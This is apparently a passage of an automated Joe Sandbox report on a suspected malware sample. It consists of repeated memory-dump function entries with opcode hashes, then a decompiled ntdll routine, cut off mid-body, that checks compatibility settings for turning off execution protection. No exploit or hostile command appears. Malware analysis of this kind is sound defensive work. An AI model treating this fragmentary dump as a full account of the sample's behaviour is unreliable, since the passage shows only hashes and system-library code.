                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 930b96912146c88c82547cfb3cfb794d9a8647c0b24faa56438330229a5010d6
                                                        • Instruction ID: c0b84912187f48731d44e89fd0c5118472bb3558d68f089df3de37eea68761ad
                                                        • Opcode Fuzzy Hash: 930b96912146c88c82547cfb3cfb794d9a8647c0b24faa56438330229a5010d6
                                                        • Instruction Fuzzy Hash: FC90027121144002D1407199844460B5005B7E0342F95C511E1419664CC655896BA2A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4499f0197e42380f64ee6ff4769d4fb904f392c6b8d2b0263d2d61ea639e1f5
                                                        • Instruction ID: 458ea09e039276b593b1877b5b68179a07b4da58949de617611da83f19b94c28
                                                        • Opcode Fuzzy Hash: d4499f0197e42380f64ee6ff4769d4fb904f392c6b8d2b0263d2d61ea639e1f5
                                                        • Instruction Fuzzy Hash: B690026125100802D140719984147070006E7D0742F95C111A1018664DC6568A7A76F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46d1dc3ad076c0c35b12bc8b6a2558b0380c0b3a76889e85bb128ad27e24bd10
                                                        • Instruction ID: 181718f8d63f2c3cee7b9c6dd0fd86792b1460912ad71d6b5d280e2e17efe239
                                                        • Opcode Fuzzy Hash: 46d1dc3ad076c0c35b12bc8b6a2558b0380c0b3a76889e85bb128ad27e24bd10
                                                        • Instruction Fuzzy Hash: 0990026121144442D14062994804B0F4105A7E1343FD5C119A514A664CC955896A67A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39198117835ad5a416b544a597836081704d3c602d893cf86b32598bc3f81a3d
                                                        • Instruction ID: d0dded9e91117ee2e2d07f0ca6ceae2965c91bb04683beff79d4ca4d5b57fa2f
                                                        • Opcode Fuzzy Hash: 39198117835ad5a416b544a597836081704d3c602d893cf86b32598bc3f81a3d
                                                        • Instruction Fuzzy Hash: B190027121140402D1006199481470B0005A7D0343F95C111A2158665DC665896675F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b4fb37186775ee5f3dfed5b6f7f64fe4dda2fb9a0020728d7eea1a8a7e594eb
                                                        • Instruction ID: 024fea91c34e963d6906f6c806e34975d32153d260375f718c9a80675981f72e
                                                        • Opcode Fuzzy Hash: 0b4fb37186775ee5f3dfed5b6f7f64fe4dda2fb9a0020728d7eea1a8a7e594eb
                                                        • Instruction Fuzzy Hash: 9F90027121140402D100619948087470005A7D0343F95C111A6158665EC6A5C9A675B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 322616656f85484c314929fb5584ca6476cedf87420eb453f69f3129fb4622d4
                                                        • Instruction ID: 19aaebe9a63caa74ae4d2e7e735cb54f4304fe0461b97a800ae0579388c01ab0
                                                        • Opcode Fuzzy Hash: 322616656f85484c314929fb5584ca6476cedf87420eb453f69f3129fb4622d4
                                                        • Instruction Fuzzy Hash: 2D90026161100042414071A988449064005BBE1352795C221A198C660DC599897A66E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d257f9fb1c240534c2f2dc50211afa83e99c7e27013ab8b5d6734f55cc3ed5b1
                                                        • Instruction ID: 50898331c0b0d8832c6c47043ac827205da9135b0f387707f602d02d64360849
                                                        • Opcode Fuzzy Hash: d257f9fb1c240534c2f2dc50211afa83e99c7e27013ab8b5d6734f55cc3ed5b1
                                                        • Instruction Fuzzy Hash: 3690026122180042D20065A94C14B070005A7D0343F95C215A1148664CC955897665A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cdb461e4f35158aea15bde63eb2b94030c9a7237bea8bda29749b202d3388ad3
                                                        • Instruction ID: 073145145ab89a21309c2f8b5b1d54d58c7ce66f3186a476310d32f1bb243adb
                                                        • Opcode Fuzzy Hash: cdb461e4f35158aea15bde63eb2b94030c9a7237bea8bda29749b202d3388ad3
                                                        • Instruction Fuzzy Hash: D89002A121200003410571994414616400AA7E0342B95C121E20086A0DC56589A671A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5573234b61b1836d5e8e1ba9a147a73b2840d96be7c9e537e882683d9e672158
                                                        • Instruction ID: ae19f97e490b5ef61a2048fc64ccb658853c0bee9f27afdf9f34c15ea288c3b3
                                                        • Opcode Fuzzy Hash: 5573234b61b1836d5e8e1ba9a147a73b2840d96be7c9e537e882683d9e672158
                                                        • Instruction Fuzzy Hash: 8D90027121100802D104619948046860005A7D0342F95C111A7018765ED6A589A671B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffb0ba479d1e549a73d43e82f0ef7436fd033b8fb9a562388d20b44679003fb6
                                                        • Instruction ID: ddf5c8848bad8f5676e5515835c7a6dd0c3e749784f9cb82f136968e302f4d14
                                                        • Opcode Fuzzy Hash: ffb0ba479d1e549a73d43e82f0ef7436fd033b8fb9a562388d20b44679003fb6
                                                        • Instruction Fuzzy Hash: 629002E1211140924500A2998404B0A4505A7E0342B95C116E2048670CC5658966A1B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ef376d54631cf2f479eeeb19058a053a3cab7dc76eab8022a2fca4f9c728a24
                                                        • Instruction ID: 587d57424e5b210f748b518887973f1602fda89171b2b9f02fdf8f98eea55351
                                                        • Opcode Fuzzy Hash: 3ef376d54631cf2f479eeeb19058a053a3cab7dc76eab8022a2fca4f9c728a24
                                                        • Instruction Fuzzy Hash: FF900271A15000129140719948146464006B7E0782B99C111A1508664CC9948B6A63E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29952b2c5c4ddfee4077dc8064b428b1325db27a4e3dcac9fdf0c9fda47c5d9b
                                                        • Instruction ID: af3d2a921e530baa40d6adf1b51a72dde0b1aea80bab1bd567784d9f4bf36aa5
                                                        • Opcode Fuzzy Hash: 29952b2c5c4ddfee4077dc8064b428b1325db27a4e3dcac9fdf0c9fda47c5d9b
                                                        • Instruction Fuzzy Hash: DA900265221000030105A59907045070046A7D5392395C121F2009660CD661897661A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b5aba3ca3fd70e60cd0ec87e70db7812c48b6668ac3649f81f66cfd7e4476d9
                                                        • Instruction ID: 93fbafe99a3832fac5079ddc4f725b5c3433a1c199226e4c9f9afa2575aeba82
                                                        • Opcode Fuzzy Hash: 3b5aba3ca3fd70e60cd0ec87e70db7812c48b6668ac3649f81f66cfd7e4476d9
                                                        • Instruction Fuzzy Hash: 04900265231000020145A599060450B0445B7D63923D5C115F240A6A0CC661897A63A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee74c35eba093abd02e066c9b43df73958ba2d9b0683f6fb22b1ad61e86adec0
                                                        • Instruction ID: f0c047b307db5f727da9e40f8492d4e7905431b9c709ff6e3baa81cd45a544ab
                                                        • Opcode Fuzzy Hash: ee74c35eba093abd02e066c9b43df73958ba2d9b0683f6fb22b1ad61e86adec0
                                                        • Instruction Fuzzy Hash: 5490026922300002D1807199540860A0005A7D1343FD5D515A1009668CC955897E63A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82c61cb06e1b13ca9201a9dcdc8e88c3e2e28ac09eb86e823277cf9c03f9fa28
                                                        • Instruction ID: fd2d9c3b39d47c5aac0f66d423cd123b8232a6da95ed7be5c92064605e4c080e
                                                        • Opcode Fuzzy Hash: 82c61cb06e1b13ca9201a9dcdc8e88c3e2e28ac09eb86e823277cf9c03f9fa28
                                                        • Instruction Fuzzy Hash: 8C90026131100003D140719954186064005F7E1342F95D111E1408664CD955896B62A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f73d3161801ff4b39e5b8c9ca712b612199aaf822884b660159b43174433a318
                                                        • Instruction ID: 303d33d2532d44cd86017ba97e1f8f2c5d54ca53d0076536f0be2ae9f6cc8d6f
                                                        • Opcode Fuzzy Hash: f73d3161801ff4b39e5b8c9ca712b612199aaf822884b660159b43174433a318
                                                        • Instruction Fuzzy Hash: F490027132114402D110619984047060005A7D1342F95C511A1818668DC6D589A671A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 607a1b6f0f39d3245112821c7b162e9e475569044ff5e59847f1af4ecea7158b
                                                        • Instruction ID: aacc0ba7920919d7d2ce1a9397575a956cf4f835602fd13e2b7c55343c2d1dd3
                                                        • Opcode Fuzzy Hash: 607a1b6f0f39d3245112821c7b162e9e475569044ff5e59847f1af4ecea7158b
                                                        • Instruction Fuzzy Hash: CD90027121100402D10065D954086460005A7E0342F95D111A6018665EC6A589A671B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4862c263e52697179fef9dae9c355e5409d01b92083e23b1b258ff0d0fdf2773
                                                        • Instruction ID: 809dd9eeb811bcb0fdd1ac5a735c3b1da2d4950d03aeebc7756ff819d46ecb6a
                                                        • Opcode Fuzzy Hash: 4862c263e52697179fef9dae9c355e5409d01b92083e23b1b258ff0d0fdf2773
                                                        • Instruction Fuzzy Hash: 3B900271311000529500A6D95804A4A4105A7F0342B95D115A5008664CC594897661A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 585414a9487580956328329334866afd2554502ba7fe0b9f34d8875f246e834d
                                                        • Instruction ID: 77e147404ca70ba173fdd36b64b4c83a1da51a368fa1337062ce5332aa2ba40c
                                                        • Opcode Fuzzy Hash: 585414a9487580956328329334866afd2554502ba7fe0b9f34d8875f246e834d
                                                        • Instruction Fuzzy Hash: 7290026161500402D140719954187060015A7D0342F95D111A1018664DC6998B6A76E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56e8b2a9e9aef2f4ad4bedb2b7bfc66207977583b58865efa67b24c8dd86d246
                                                        • Instruction ID: d70a4808422dabf34c84e92f32e1b398fcce0bc3734019a9fd3712418bec3842
                                                        • Opcode Fuzzy Hash: 56e8b2a9e9aef2f4ad4bedb2b7bfc66207977583b58865efa67b24c8dd86d246
                                                        • Instruction Fuzzy Hash: D190027121100403D100619955087070005A7D0342F95D511A1418668DD696896671A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        C-Code - Quality: 63%
                                                        			E017E40FD(void* __ecx) {
                                                        				signed int _v8;
                                                        				char _v548;
                                                        				unsigned int _v552;
                                                        				unsigned int _v556;
                                                        				unsigned int _v560;
                                                        				char _v564;
                                                        				char _v568;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				unsigned int _t49;
                                                        				signed char _t53;
                                                        				unsigned int _t55;
                                                        				unsigned int _t56;
                                                        				unsigned int _t65;
                                                        				unsigned int _t66;
                                                        				void* _t68;
                                                        				unsigned int _t73;
                                                        				unsigned int _t77;
                                                        				unsigned int _t85;
                                                        				char* _t98;
                                                        				unsigned int _t102;
                                                        				signed int _t103;
                                                        				void* _t105;
                                                        				signed int _t107;
                                                        				void* _t108;
                                                        				void* _t110;
                                                        				void* _t111;
                                                        				void* _t112;
                                                        
                                                        				_t45 =  *0x18dd360 ^ _t107;
                                                        				_v8 =  *0x18dd360 ^ _t107;
                                                        				_t105 = __ecx;
                                                        				if( *0x18d84d4 == 0) {
                                                        					L5:
                                                        					return E0182B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                        				}
                                                        				_t85 = 0;
                                                        				E017FE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                        				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                        					_t45 = 0;
                                                        				} else {
                                                        					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                        				}
                                                        				if(_t45 == 0) {
                                                        					_v552 = _t85;
                                                        					_t49 = E017E42EB(_t105);
                                                        					__eflags = _t49;
                                                        					if(_t49 != 0) {
                                                        						L15:
                                                        						_t103 = 2;
                                                        						_v552 = _t103;
                                                        						L10:
                                                        						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                        						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                        							_t45 = 1;
                                                        						} else {
                                                        							_t53 = E017E41EA(_v564);
                                                        							asm("sbb al, al");
                                                        							_t45 =  ~_t53 + 1;
                                                        							__eflags = _t45;
                                                        						}
                                                        						__eflags = _t45;
                                                        						if(_t45 == 0) {
                                                        							_t102 = _t103 | 0x00000040;
                                                        							_v552 = _t102;
                                                        						}
                                                        						__eflags = _t102;
                                                        						if(_t102 != 0) {
                                                        							L33:
                                                        							_push(4);
                                                        							_push( &_v552);
                                                        							_push(0x22);
                                                        							_push(0xffffffff);
                                                        							_t45 = E018296C0();
                                                        						}
                                                        						goto L4;
                                                        					}
                                                        					_v556 = _t85;
                                                        					_t102 =  &_v556;
                                                        					_t55 = E017E429E(_t105 + 0x2c, _t102);
                                                        					__eflags = _t55;
                                                        					if(_t55 >= 0) {
                                                        						__eflags = _v556 - _t85;
                                                        						if(_v556 == _t85) {
                                                        							goto L8;
                                                        						}
                                                        						_t85 = _t105 + 0x24;
                                                        						E01875720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
                                                        						_v560 = 0x214;
                                                        						E0182FA60( &_v548, 0, 0x214);
                                                        						_t106 =  *0x18d84d4;
                                                        						_t110 = _t108 + 0x20;
                                                        						 *0x18db1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                        						_t65 =  *((intOrPtr*)( *0x18d84d4))();
                                                        						__eflags = _t65;
                                                        						if(_t65 == 0) {
                                                        							goto L8;
                                                        						}
                                                        						_t66 = _v560;
                                                        						__eflags = _t66;
                                                        						if(_t66 == 0) {
                                                        							goto L8;
                                                        						}
                                                        						__eflags = _t66 - 0x214;
                                                        						if(_t66 >= 0x214) {
                                                        							goto L8;
                                                        						}
                                                        						_t68 = (_t66 >> 1) * 2 - 2;
                                                        						__eflags = _t68 - 0x214;
                                                        						if(_t68 >= 0x214) {
                                                        							E0182B75A();
                                                        							goto L33;
                                                        						}
                                                        						_push(_t85);
                                                        						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                        						E01875720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                        						_t111 = _t110 + 0x14;
                                                        						_t73 = E01831480( &_v548, L"Execute=1");
                                                        						_push(_t85);
                                                        						__eflags = _t73;
                                                        						if(_t73 == 0) {
                                                        							E01875720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                        							_t106 =  &_v548;
                                                        							_t98 =  &_v548;
                                                        							_t112 = _t111 + 0x14;
                                                        							_t77 = _v560 + _t98;
                                                        							_v556 = _t77;
                                                        							__eflags = _t98 - _t77;
                                                        							if(_t98 >= _t77) {
                                                        								goto L8;
                                                        							} else {
                                                        								goto L27;
                                                        							}
                                                        							do {
                                                        								L27:
                                                        								_t85 = E01831150(_t106, 0x20);
                                                        								__eflags = _t85;
                                                        								if(__eflags != 0) {
                                                        									__eflags = 0;
                                                        									 *_t85 = 0;
                                                        								}
                                                        								E01875720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                        								_t112 = _t112 + 0x10;
                                                        								E01863E13(_t105, _t106, __eflags);
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									goto L8;
                                                        								}
                                                        								_t41 = _t85 + 2; // 0x2
                                                        								_t106 = _t41;
                                                        								__eflags = _t106 - _v556;
                                                        							} while (_t106 < _v556);
                                                        							goto L8;
                                                        						}
                                                        						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                        						_push(3);
                                                        						_push(0x55);
                                                        						E01875720();
                                                        						goto L15;
                                                        					}
                                                        					L8:
                                                        					_t56 = E017E41F7(_t105);
